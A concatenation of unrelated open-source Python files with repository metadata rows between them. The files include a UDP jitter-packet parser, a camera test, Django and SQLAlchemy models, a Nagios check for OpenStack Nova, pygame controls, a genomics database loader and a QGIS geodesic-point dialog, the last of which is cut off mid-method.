01:ba:00:18:00:00:00:00:00:04:00:10:00:00:00:00:0a:4f:94:d3:27:10:1b:58
'''.strip().splitlines()
pcap_req = '''
00:02:00:00:05:0b:02:a6:00:00:00:00:00:01:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:02:b1:00:00:00:00:00:02:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:d7:00:00:00:00:00:01:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:e1:00:00:00:00:00:02:00:00:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
'''.strip().splitlines()
pcap_res = '''
00:02:00:00:05:0b:02:a6:04:e6:3f:10:00:01:00:01:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:02:b1:04:e6:3f:1b:00:02:00:02:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:00:05:0b:77:d7:04:e6:b4:3e:00:01:00:01:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
00:02:00:01:05:0b:77:e1:04:e6:b4:47:00:02:00:02:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd:ab:cd
'''.strip().splitlines()
if __name__ == '__main__':
import socket
ip = '192.168.221.101'
dst_ip = socket.inet_aton(ip)
udp_port = 10000
sn = 100
unknown = 7000
init_req = pack_init_request(sn, dst_ip, udp_port, unknown)
init_res = pack_init_response(init_req)
req = pack_jitter_request(sn)
res = pack_jitter_response(req)
# print unpack_init_req(init_req)
# print unpack_init_res(init_res)
# print unpack_jitter_req(req)[:6]
# print unpack_jitter_res(res)[:6]
#
# for i in range(3):
# string = convert_string(pcap_init_req[i])
# print unpack_init_req(string)
# string = convert_string(pcap_init_res[i])
# print unpack_init_res(string)
#
for i in range(4):
string = convert_string(pcap_req[i])
print unpack_jitter_req(string)
string = convert_string(pcap_res[i])
print unpack_jitter_res(string)
address = ('192.168.100.106', 10000)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(address)
start_time = time.time()
while 1:
message, ip = s.recvfrom(2048)
p = unpack_jitter_req(message)
print ip, '%6f'%(time.time() - start_time)
print p[:6]
# r = pack_jitter_response(message)
# print unpack_jitter_res(r)
# s.sendto(r, ip)
s.close()
|
UTF-8
|
Python
| false | false | 2,014 |
13,408,887,908,772 |
6b60468d2347d68659057d955b29dfad5038d5e2
|
fe6f0c70a0f0a50cb4c7a75116b8fd6ec51fcce9
|
/src/missions/TestMissions.py
|
57c852e74a4d1010028822081d4ea4aaa0961771
|
[] |
no_license
|
mforkin/stratosphere
|
https://github.com/mforkin/stratosphere
|
0e737902e4cc4c1d0e46140cf9edba44564ec045
|
08812c1596d331b885b9ccc1df09c13111c75591
|
refs/heads/master
| 2020-06-02T21:49:48.133847 | 2014-08-23T05:34:56 | 2014-08-23T05:34:56 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import time
import threading
class CameraTestMission(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
camera = self.components.get('camera')
camera.start_preview()
time.sleep
camera.capture('test.png')
time.sleep(2)
camera.start_recording('test.h264')
camera.wait_recording(10)
camera.stop_recording()
camera.stop_preview()
|
UTF-8
|
Python
| false | false | 2,014 |
10,419,590,687,283 |
1541726c8ec41cb11f6544fc07bc8b37f7802570
|
d014d54479bed58cee4c66e49882150362e0011e
|
/src/cms/cms/model/document.py
|
e818bf88d92417f5daa2a8f33f6db821624707cb
|
[] |
no_license
|
freelizhun/eencms
|
https://github.com/freelizhun/eencms
|
3ca1389ddccf368f19fe1d7e125bd56aa4f2ee90
|
7426bc72b193d89e74891d6daec31de4f1ea4da0
|
refs/heads/master
| 2021-05-26T12:24:10.544269 | 2013-02-21T09:16:22 | 2013-02-21T09:16:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from sqlalchemy import Column
from sqlalchemy.types import Integer, String
from cms.model.meta import Base
class Document(Base):
__tablename__ = "document"
id = Column(Integer, primary_key=True)
filename = Column(String(255))
filesize = Column(Integer)
filelocation = Column(String(255))
filetype = Column(String(255))
def __repr__(self):
return "<Document id=%r;title=%s)>" % (self.id, self.filename)
|
UTF-8
|
Python
| false | false | 2,013 |
16,423,954,967,283 |
8b4c2f37494bf72bc937687e7336f3aa3999ce21
|
dfa85bba5567e0846fe7839fdb1496ea3297fe15
|
/cccmv/mitgliederverwaltung/models.py
|
5ff76ab55037f5c501cae1bc30cf6e6db8dca788
|
[
"GPL-3.0-only"
] |
non_permissive
|
gnomus/cccmv
|
https://github.com/gnomus/cccmv
|
58c8bea733528a7c4919c9089e80544666cdc3ad
|
8af06c28ffedee9f8bba3d57ae69121a6e7f5d17
|
refs/heads/master
| 2020-12-30T10:50:15.147706 | 2014-01-06T15:42:05 | 2014-01-06T15:42:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.db import models
# Create your models here.
class Erfa(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=200)
anschrift = models.CharField(max_length=200)
email = models.CharField(max_length=200)
class Mitglied(models.Model):
def __str__(self):
return str(self.chaosnummer) + ': ' + self.vorname + ' ' + self.nachname
chaosnummer = models.IntegerField(default=0)
vorname = models.CharField(max_length=200)
nachname = models.CharField(max_length=200)
anschrift = models.CharField(max_length=200)
email = models.CharField(max_length=200)
erfa = models.ForeignKey(Erfa)
|
UTF-8
|
Python
| false | false | 2,014 |
2,731,599,208,357 |
b9d66d1ed9b2c4350c9656786bb8801e6323fdaa
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_2/odncas001/question1.py
|
52f408e05cc55dff9e1d29291c83171a9a6cc98a
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
https://github.com/MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def leap_year (year):
if year%400==0:
print (year, "is a leap year.")
elif year%4==0 and year%100>0:
print (year,"is a leap year.")
else:
print (year,"is not a leap year.")
year=eval(input("Enter a year:\n"))
leap_year(year)
|
UTF-8
|
Python
| false | false | 2,014 |
13,091,060,342,704 |
75c50b548ba21cec59a1f855a9226867081883bd
|
4a3cf3ecbdd0e616b0f330ba5a39f76235f2503f
|
/nagios-plugins/check_nova
|
91be3169edf9d23740ba363b33c96bdbaa0ea9f1
|
[] |
no_license
|
Will-Yin/openstack-monitoring
|
https://github.com/Will-Yin/openstack-monitoring
|
8c0163585a5e06dd2765f61d243e6bbe7014fa5a
|
9c8a44364414c85cd59bae500cdd2262718a89e6
|
refs/heads/master
| 2021-05-07T23:00:23.392117 | 2014-05-20T15:00:42 | 2014-05-20T15:00:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
"""
** Copyright (C) 2014 Koffi Nogbe at gmail dot com
** This program is free software: you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation, either version 3 of the License, or
** (at your option) any later version.
** This program is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
** GNU General Public License for more details.
** You should have received a copy of the GNU General Public License
** along with this program. If not, see <http://www.gnu.org/licenses/>.
** ***********************************
** This program allow you to monitor openstack nova service
** This is a content base monitor as oppose to just port check
** It create an instance and delete it and poll the time it takes to
** to create/delete. It use a config file openrc.cfg
** Syntax:
** check_cinder -C/--config [config file] -i/--instance [instance to create] -w/--warning [warning timeout] -c/--critical [ critical timeout ]
"""
import sys
import time
import argparse
from novaclient.client import Client
from nagioslib.nagioslib import *
STATUS_OK = 0
STATUS_WARNING = 1
STATUS_CRITICAL = 2
STATUS_UNKNOWN = 3
defaultCFG = 'openrc.cfg'
def findServer(instancesList,instance):
for inst in instancesList:
if inst.name == instance:
return True
def main():
parser = argparse.ArgumentParser(description="check_keystone nagios plugin for OpenStack Keystone")
parser.add_argument("-C","--config", help="Openstack rc configuration file - default is openrc.cfg")
parser.add_argument("-i","--instance", help="OpenStack instance to monitor", required=True)
parser.add_argument("-w","--warning", help="Warning time to retrieve the user", required=True)
parser.add_argument("-c","--critical", help="Critical time to retrieve the user", required=True)
args = parser.parse_args()
if args.config:
configFile = args.config
else:
configFile = defaultCFG
cred = credential(configFile)
novaVersion = '1.1'
startTime = time.time()
try:
nova = Client(novaVersion,cred.getCinder()['username'],cred.getCinder()['password'],cred.getCinder()['tenant_name'],cred.getCinder()['auth_url'])
except:
print "Unable to connect to OpenStack API endpoint."
sys.exit(STATUS_CRITICAL)
find = findServer(nova.servers.list(),args.instance)
endTime = time.time()
timeElapse = endTime - startTime
if find:
if timeElapse < float(args.warning):
print "OpenStack Nova OK! Nova Instance name %s retrieval successfull. Time taken for retrieval %s | Instance Name Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
sys.exit(STATUS_OK)
elif (timeElapse >= float(args.warning)) and (timeElapse < float(args.critical)):
print "OpenStack Nova Warning! Nova Instance name %s retrieval successfull but time taken was longer. Time taken for retrieval %s | Nova Instance Name Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
sys.exit(STATUS_WARNING)
elif timeElapse >= float(args.critical):
print "OpenStack Nova Critical! Nova Instance name %s retrieval successfull but time taken was longer than critical time. Time taken for retrieval %s | Nova Instance Retrieval Time=%s" % (args.instance,round(timeElapse,3),round(timeElapse,3))
sys.exit(STATUS_CRITICAL)
else:
print "OpenStack Might be OK! But the Nova Instance name you have specified could not be found."
sys.exit(STATUS_WARNING)
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,014 |
3,848,290,728,478 |
88165f0da0f5572fe034459be15ae8ce808f4fca
|
10a190efddadfaad31372d8a5acf9d76e081f5a7
|
/src/Python/modules/device_info/detect_device_info_linux.py
|
486493a2d3c434db6359200cf7c316d9c40e6c12
|
[] |
no_license
|
Auzzy/personal
|
https://github.com/Auzzy/personal
|
1b410d84f3135ee9b5d271e3a9b71d110273c198
|
e8135c5023ae55b947863d0ab1be94c40591ac58
|
refs/heads/master
| 2016-09-11T04:18:58.934896 | 2014-06-14T05:58:40 | 2014-06-14T05:58:40 | 1,724,124 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from parse_parts import parse_parts
from parse_devs import parse_devs
# Each key must exist as info about the device. If any of these keys doesn't exist, it is not a valid and useful device. The value is the required value. If this value does not match the value given by the device, then it is not a valid device. If the required value is None, then do not check the value given by the device. See the _filter_non_fs() to see its use.
_fs_attribs = {"ID_FS_TYPE":None, "DEVTYPE":"partition"}
# Device info attributes that must be decoded.
_decode_attribs = ["ID_VENDOR_ENC", "ID_MODEL_ENC", "ID_FS_LABEL_ENC"]
# Device info keys and their associated human readable name. These keys will exist in the output dictionary.
_attribs_dict = {"DEVNAME":"device", "ID_VENDOR_DEC":"vendor", "ID_MODEL_DEC":"product", "ID_FS_LABEL_DEC":"label"}
# dict{str:dict{str:str}} -> dict{str:dict{str:str}}
def _filter_attribs(all_dev_info):
new_dev_info = {}
for dev_name in all_dev_info:
new_dev_info[dev_name] = {}
for attrib in _attribs_dict:
new_dev_info[dev_name][_attribs_dict[attrib]] = all_dev_info[dev_name][attrib]
return new_dev_info
# str -> str
def _decode(string):
if string is None:
return None
new_str = ""
hex_marker = r"\x"
while hex_marker in string:
char_start = string.index(hex_marker)
decoded_char = str(unichr(int(string[char_start+2:char_start+4],16)))
new_str += string[:char_start]
new_str += decoded_char
string = string[char_start+4:]
new_str += string
return new_str
# dict{str:dict{str:str}} -> None
def _decode_values(all_dev_info):
for dev_name in all_dev_info:
for encode_key in _decode_attribs:
encoded_val = all_dev_info[dev_name][encode_key]
if encoded_val is not None:
decode_key = encode_key.replace("_ENC","_DEC")
all_dev_info[dev_name][decode_key] = _decode(encoded_val).strip()
# dict{str:dict{str:str}} -> None
def _insert_placeholders(all_dev_info):
for dev_name in all_dev_info:
for attrib in _decode_attribs+_attribs_dict.keys():
if attrib not in all_dev_info[dev_name]:
all_dev_info[dev_name][attrib] = None
# dict{str:dict{str:str}} -> bool
def _valid_fs_val(dev_info, fs_attrib):
if fs_attrib in dev_info.keys():
fs_attrib_val = _fs_attribs[fs_attrib]
if fs_attrib_val is None or dev_info[fs_attrib]==fs_attrib_val:
return True
return False
# dict{str:dict{str:str}} -> bool
def _valid_device(dev_info):
for fs_attrib in _fs_attribs:
if not _valid_fs_val(dev_info,fs_attrib):
return False
return True
# dict{str:dict{str:str}} -> None
def _filter_non_fs(all_dev_info):
for dev in all_dev_info.keys()[:]:
if not _valid_device(all_dev_info[dev]):
del all_dev_info[dev]
# list[str] -> dict{str:dict{str:str}}
def _get_device_info(all_part_names):
all_dev_info = parse_devs(all_part_names)
_filter_non_fs(all_dev_info)
_insert_placeholders(all_dev_info)
_decode_values(all_dev_info)
return _filter_attribs(all_dev_info)
# None -> list[str]
def _get_partition_names():
all_part_info = parse_parts()
if len(all_part_info)==0:
raise OSError("As no partitions were detected, it is likely there was an error with reading /proc/partitions. Please check to see that the file format has not changed.")
if "name" not in all_part_info[0].keys():
raise OSError("The \"name\" property could not be found. Check to see if the format of /proc/partitions has changed.")
return [part_info["name"] for part_info in all_part_info]
# None -> dict{str:dict{str:str}}
def detect_device_info():
all_part_names = _get_partition_names()
all_dev_info = _get_device_info(all_part_names)
return all_dev_info
if __name__=="__main__":
all_dev_info = detect_device_info()
for dev_name in all_dev_info:
print dev_name
for attrib in all_dev_info[dev_name]:
print "{0}: {1}".format(attrib,all_dev_info[dev_name][attrib])
print
|
UTF-8
|
Python
| false | false | 2,014 |
17,403,207,514,741 |
3faf0c348b23a123328641c02ac160d8460fb430
|
f3c58a46be70583a6d2b9692122df2010af22734
|
/controls.py
|
cc3e34d6da913a3c9626c27ac031d6fdc61e4b63
|
[
"GPL-3.0-only"
] |
non_permissive
|
DanailKoychev/Cronch-game
|
https://github.com/DanailKoychev/Cronch-game
|
0fc88be8ec7a37e8b88da7351f2c8731973e80de
|
2e797aacb704883afee8d00fd028af1b33979f8b
|
refs/heads/master
| 2021-01-22T07:13:48.553603 | 2014-06-28T11:19:52 | 2014-06-28T11:19:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from pygame.locals import *
import pygame
class Controls:
MOVE_LEFT = 1
MOVE_RIGHT = 2
USE_SKILL = 3
AIM_LEFT = 4
AIM_RIGHT = 5
SHOOT = 6
def get_keyboard_input_player_2():
instructions = []
keys = pygame.key.get_pressed()
if keys[K_KP1]:
instructions.append(Controls.MOVE_LEFT)
if keys[K_KP3]:
instructions.append(Controls.MOVE_RIGHT)
if keys[K_KP5]:
instructions.append(Controls.USE_SKILL)
if keys[K_LEFT]:
instructions.append(Controls.AIM_LEFT)
if keys[K_RIGHT]:
instructions.append(Controls.AIM_RIGHT)
if keys[K_UP]:
instructions.append(Controls.SHOOT)
return instructions
def get_keyboard_input_player_1():
instructions = []
keys = pygame.key.get_pressed()
if keys[K_g]:
instructions.append(Controls.MOVE_LEFT)
if keys[K_j]:
instructions.append(Controls.MOVE_RIGHT)
if keys[K_y]:
instructions.append(Controls.USE_SKILL)
if keys[K_a]:
instructions.append(Controls.AIM_LEFT)
if keys[K_d]:
instructions.append(Controls.AIM_RIGHT)
if keys[K_w]:
instructions.append(Controls.SHOOT)
return instructions
|
UTF-8
|
Python
| false | false | 2,014 |
8,040,178,797,697 |
57413e56698b360c33754b90fab78a783d78a7a8
|
1a897f626be0348ab84aee55bb3f3adc5167ac82
|
/src/db/input/AddIndividualAlignmentConsensusSequence2DB.py
|
0aac86e5bb8b654368bee660a56c5a141dd14933
|
[] |
no_license
|
polyactis/vervet-web
|
https://github.com/polyactis/vervet-web
|
13f2fc1f0e8711045e7e592ef6c5e61065d8b269
|
a550680f83d4c0c524734ee94bdd540c40f3a537
|
refs/heads/master
| 2021-01-01T18:18:09.094561 | 2014-05-15T23:37:54 | 2014-05-15T23:37:54 | 32,554,427 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
"""
Examples:
%s
%s -i folderMap/926_635_tantalus_GA_vs_524.fq.gz --individual_alignment_id 926
--format fastq --minDP 4 --maxDP=16 --minBaseQ=20 --minMapQ 30 --minRMSMapQ 10
--minDistanceToIndel 5 --data_dir /u/home/eeskin/polyacti/NetworkData/vervet/db/
--logFilename folderMap/926_635_tantalus_GA_vs_524_alignment926_2DB.log
--drivername postgresql --hostname localhost --dbname vervetdb
--db_user yh --db_passwd secret --schema public --commit
Description:
2013.2.8 add alignment consensus sequence file (fastq format, input of the fq2psmcfa program from PSMC) to db
"""
import sys, os, math
__doc__ = __doc__%(sys.argv[0], sys.argv[0])
sys.path.insert(0, os.path.expanduser('~/lib/python'))
sys.path.insert(0, os.path.join(os.path.expanduser('~/script')))
import copy
from pymodule import ProcessOptions, PassingData, utils, NextGenSeq
from vervet.src.mapper.AbstractVervetMapper import AbstractVervetMapper
from vervet.src import VervetDB
class AddIndividualAlignmentConsensusSequence2DB(AbstractVervetMapper):
__doc__ = __doc__
option_default_dict = copy.deepcopy(AbstractVervetMapper.option_default_dict)
#option_default_dict.pop(('inputFname', 0, ))
option_default_dict.pop(('outputFname', 0, ))
option_default_dict.pop(('outputFnamePrefix', 0, ))
option_default_dict.update({
('individual_alignment_id', 1, int):[None, '', 1, 'alignment id'],\
('minDP', 1, int):[None, '', 1, 'minimum read depth at that locus'],\
('maxDP', 1, int):[None, '', 1, 'maximum read depth at that locus'],\
('minBaseQ', 1, int):[20, '', 1, 'inferred consensus base quality '],\
('minMapQ', 1, int):[30, '', 1, 'read alignment mapping quality'],\
('minRMSMapQ', 1, int):[10, '', 1, 'root mean squared mapping quality of reads covering the locus'],\
('minDistanceToIndel', 1, int):[5, '', 1, 'min distance to predicted short insertions or deletions'],\
('format', 1, ):['fastq', '', 1, 'format of the input file'],\
})
def __init__(self, inputFnameLs=None, **keywords):
"""
"""
AbstractVervetMapper.__init__(self, inputFnameLs=inputFnameLs, **keywords)
self.inputFname= os.path.realpath(self.inputFname)
def add2DB(self, db=None, individual_alignment_id=None, inputFname=None, format=None, minDP=None, maxDP=None, minBaseQ=None, minMapQ=None,\
minRMSMapQ=None, minDistanceToIndel=None, comment=None, data_dir=None, commit=0):
"""
2012.11.13
"""
session = db.session
session.begin()
#2012.11.13 check if it's in db already
db_entry = db.checkIndividualAlignmentConsensusSequence(individual_alignment_id=individual_alignment_id, minDP=minDP, \
maxDP=maxDP, minBaseQ=minBaseQ, minMapQ=minMapQ,\
minRMSMapQ=minRMSMapQ, minDistanceToIndel=minDistanceToIndel)
if db_entry:
sys.stderr.write("Warning: IndividualAlignmentConsensusSequence of (individual_alignment_id=%s, minDP %s, maxDP %s, etc.) already in db with id=%s.\n"%\
(individual_alignment_id, minDP, maxDP, db_entry.id))
sys.exit(3)
else:
countData = NextGenSeq.countNoOfChromosomesBasesInFastQFile(inputFname)
no_of_chromosomes = countData.no_of_chromosomes
no_of_bases = countData.no_of_bases
db_entry = db.getIndividualAlignmentConsensusSequence(individual_alignment_id=individual_alignment_id, format=format, \
minDP=minDP, maxDP=maxDP, minBaseQ=minBaseQ, \
minMapQ=minMapQ, minRMSMapQ=minRMSMapQ, minDistanceToIndel=minDistanceToIndel, \
no_of_chromosomes=no_of_chromosomes,no_of_bases=no_of_bases, \
original_path=os.path.abspath(inputFname), data_dir=data_dir)
if commit:
inputFileBasename = os.path.basename(inputFname)
#moveFileIntoDBAffiliatedStorage() will also set db_entry.path
exitCode = db.moveFileIntoDBAffiliatedStorage(db_entry=db_entry, filename=inputFileBasename, \
inputDir=os.path.split(inputFname)[0], \
outputDir=data_dir,\
relativeOutputDir=None, shellCommand='cp -rL', \
srcFilenameLs=self.srcFilenameLs, dstFilenameLs=self.dstFilenameLs,\
constructRelativePathFunction=db_entry.constructRelativePath, data_dir=data_dir)
if exitCode!=0:
sys.stderr.write("Error: moveFileIntoDBAffiliatedStorage() exits with %s code.\n"%(exitCode))
session.rollback()
self.cleanUpAndExitOnFailure(exitCode=exitCode)
session.flush()
session.commit()
else: #default is also rollback(). to demonstrate good programming
session.rollback()
def run(self):
"""
2012.7.13
"""
if self.debug:
import pdb
pdb.set_trace()
#add the extracted association result into db
self.add2DB(db=self.db_vervet, individual_alignment_id=self.individual_alignment_id, inputFname=self.inputFname, \
format=self.format, minDP=self.minDP, maxDP=self.maxDP, minBaseQ=self.minBaseQ, minMapQ=self.minMapQ, \
minRMSMapQ=self.minRMSMapQ, minDistanceToIndel=self.minDistanceToIndel, comment=None, \
data_dir=self.data_dir, commit=self.commit)
self.outputLogMessage("submission done.\n")
if __name__ == '__main__':
main_class = AddIndividualAlignmentConsensusSequence2DB
po = ProcessOptions(sys.argv, main_class.option_default_dict, error_doc=main_class.__doc__)
instance = main_class(po.arguments, **po.long_option2value)
instance.run()
|
UTF-8
|
Python
| false | false | 2,014 |
16,286,516,009,867 |
5cc8ebec47276d7154435ffec8c44479b92f9f43
|
d84922ed03e9d01c84e92b384f20b87edb3ece6d
|
/src/cog_abm/extras/color.py
|
32b4a0b6df7e2f64a6732fc1de8ea1f59ae4b31e
|
[
"BSD-3-Clause"
] |
permissive
|
plewczynski/cog-abm
|
https://github.com/plewczynski/cog-abm
|
b1d37cf70f4a1d005e424a085159818dd776bd5e
|
6f6450141a996b067d3a396d47f4386215a4042c
|
refs/heads/master
| 2021-05-27T11:33:24.433639 | 2012-08-25T21:01:37 | 2012-08-25T21:01:37 | 765,520 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Module providing definition of the Color class, implementing Perception's and
the Stimulus' interfaces.
"""
from cog_abm.ML.core import Sample, euclidean_distance
class Color(Sample):
"""
Color represented in CIE L*a*b* space
"""
def __init__(self, L, a, b):
"""
Initialize Color
http://en.wikipedia.org/wiki/Lab_color_space
section: Range_of_L.2Aa.2Ab.2A_coordinates
@param L: lightness - should be in [0,100]
@param a: can be negative
@param b: can be negative
"""
super(Color, self).__init__([L, a, b], dist_fun=euclidean_distance)
self.L = L
self.a = a
self.b = b
def get_WCS_colors():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(
os.path.join(os.path.dirname(__file__), "330WCS.xml")).stimuli
def get_1269Munsell_chips():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(os.path.join(os.path.dirname(__file__),
"1269_munsell_chips.xml")).stimuli
|
UTF-8
|
Python
| false | false | 2,012 |
16,904,991,298,362 |
304a340d51b3169e268d83e856f09f3e3f69d38c
|
c6a291151e89bdc5fb10306dd66407fa21bad3a8
|
/Text/CountVowels.py
|
1816d96ae992495f7a4bc38458ef1d1a4f199a90
|
[
"LicenseRef-scancode-proprietary-license"
] |
non_permissive
|
gcousins/PythonChallenge
|
https://github.com/gcousins/PythonChallenge
|
6f61579ea84583d5a492046b1c15ef692cc487fd
|
ec41ad6e4573eebc4becc652255de39cd030eaa0
|
refs/heads/master
| 2016-09-05T16:49:45.861387 | 2013-07-11T03:29:26 | 2013-07-11T03:29:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# define vowels
vowels = 'aeiou'
def CountVowels(text):
# initialize vowel count as zero
count = 0
# for every letter in text, see if it is a vowel
for i in text:
if i in vowels:
count = count + 1
else:
None
# print the total
print(str(count))
#print the count of each vowel
for x in vowels:
print(x + ': ' + str(text.count(x)))
#set loop to continuously run
while True:
#intialize user input requst
text = str(raw_input("Please enter a word to count the vowels: "))
#terminate the loop if nothing is entered
if text == "":
print('Goodbye')
break
else:
#run the reverse function on the input
CountVowels(text)
|
UTF-8
|
Python
| false | false | 2,013 |
1,700,807,076,898 |
64a1a17d14d2c374ac49cbaca5c0ca3767838a74
|
76d36b932c50a8755968addff84443c3dc4f8485
|
/tools/geodesicbase.py
|
9261a53b5d016d18e69ace6c1c1ddef1f0b83e10
|
[] |
no_license
|
tuapsekad/openLand
|
https://github.com/tuapsekad/openLand
|
35e27dfe2428aa30a5e1d673545420fab04f6aa2
|
7c418cfb84a228c06ce6838397d38723fb32bec7
|
refs/heads/master
| 2021-01-23T21:33:05.799625 | 2014-07-04T03:57:14 | 2014-07-04T03:57:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
'''
/***************************************************************************
geodesicbase for openland (cadastral engineer tools)
copyright : (C) 2013 by Dmitriy Biryuchkov
email : [email protected]
***************************************************************************/
'''
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from datetime import *
import uuid
from geodesicbase_ui import Ui_DialogGeodesicBase
from common import *
class GeodesicBase(QDialog, Ui_DialogGeodesicBase):
def __init__(self, iface):
QDialog.__init__(self, iface.mainWindow())
self.iface = iface
self.canvas = self.iface.mapCanvas()
self.setupUi(self)
self.connect(self.pushButtonSelect, SIGNAL("clicked()"), self.selectData)
self.connect(self.pushButtonAdd, SIGNAL("clicked()"), self.addData)
self.connect(self.pushButtonEdit, SIGNAL("clicked()"), self.editData)
self.connect(self.pushButtonDel, SIGNAL("clicked()"), self.delData)
self.connect(self.pushButtonSave, SIGNAL("clicked()"), self.saveData)
self.connect(self.pushButtonRefresh, SIGNAL("clicked()"), self.refreshData)
self.connect(self.pushButtonClose, SIGNAL("clicked()"), self.closeDialog)
self.connect(self.treeWidget, SIGNAL("itemSelectionChanged()"), self.fillLinesEdit)
self.guidGeodesicBase = None
self.selectedGuid = None
self.idCurrentMsk = None
def fillTree(self):
guidGeodesicBase = ''
self.treeWidget.clear()
lastSelectedGeodesicBaseItem = None
listGeodesicBase = attributesBySearchCondition('pb_geo_osnova', 'true',
attributesNamesGeodesicBase)
for everyGeodesicBase in listGeodesicBase:
guidGeodesicBase = str(everyGeodesicBase['guid'])
name = everyGeodesicBase['nazvanie_punkta']
x = str(everyGeodesicBase['x'])
y = str(everyGeodesicBase['y'])
itemForInsert = QTreeWidgetItem([name, x, y])
itemForInsert.setData(3, 0, guidGeodesicBase)
self.treeWidget.addTopLevelItem(itemForInsert)
if self.guidGeodesicBase == guidGeodesicBase:
lastSelectedGeodesicBaseItem = itemForInsert
if lastSelectedGeodesicBaseItem != None:
self.treeWidget.setCurrentItem(lastSelectedGeodesicBaseItem)
self.pushButtonSelect.setEnabled(True)
def fillLinesEdit(self):
if len(self.treeWidget.selectedItems()) == 1:
self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
if self.guidGeodesicBase != None:
attributesGeodesicBase = attributesByKeys('pb_geo_osnova', 'guid',
[self.guidGeodesicBase],
attributesNamesGeodesicBase)
# guid пропускаем
self.lineEditPName.setText(attributesGeodesicBase[0]['nazvanie_punkta'])
self.lineEditPKind.setText(reNull(attributesGeodesicBase[0]['tip_znaka'], ''))
self.lineEditPKlass.setText(reNull(attributesGeodesicBase[0]['klass_geo_seti'], ''))
self.lineEditOrdX.setText(str(attributesGeodesicBase[0]['x']))
self.lineEditOrdY.setText(str(attributesGeodesicBase[0]['y']))
self.pushButtonSelect.setEnabled(True)
else:
self.pushButtonSelect.setEnabled(False)
def selectData(self):
if len(self.treeWidget.selectedItems()) == 1:
self.selectedGuid = self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
self.close()
def addData(self):
guidGeodesicBase = str(uuid.uuid4())
self.idCurrentMsk = str(idCurrentMSK())
# 'guid', 'id_sistema_koordinat', 'nazvanie_punkta', 'tip_znaka', 'klass_geo_seti', 'x', 'y'
# 0 1 2 3 4 5 6
try:
x = float(self.lineEditOrdX.text())
except:
x = 0.0
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования X')
try:
y = float(self.lineEditOrdY.text())
except:
y = 0.0
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования Y')
listValues = []
listValues.append(guidGeodesicBase)
listValues.append(self.idCurrentMsk)
listValues.append(self.lineEditPName.text())
listValues.append(self.lineEditPKind.text())
listValues.append(self.lineEditPKlass.text())
listValues.append(x)
listValues.append(y)
if insertFeatures('pb_geo_osnova', attributesNamesGeodesicBase, [listValues]):
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено добавление атрибутов пункта геодезической сети')
self.guidGeodesicBase = guidGeodesicBase
else:
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка добавления атрибутов пункта геодезической сети')
self.fillTree()
def editData(self):
if len(self.treeWidget.selectedItems()) == 1:
self.pushButtonAdd.setEnabled(False)
self.pushButtonEdit.setEnabled(False)
self.pushButtonSave.setEnabled(True)
self.pushButtonDel.setEnabled(False)
def delData(self):
if len(self.treeWidget.selectedItems()) == 1:
self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
nameForDelete = self.treeWidget.currentItem().text(0)
reply = QMessageBox.question(self, u'Потверждение',
u'Удалить информацию о пункте геодезической сети ' + nameForDelete + '?',
okay|cancel, defaultButton=cancel)
if reply == okay:
if deleteById('pb_geo_osnova', self.guidGeodesicBase):
self.guidGeodesicBase = None
self.refreshData()
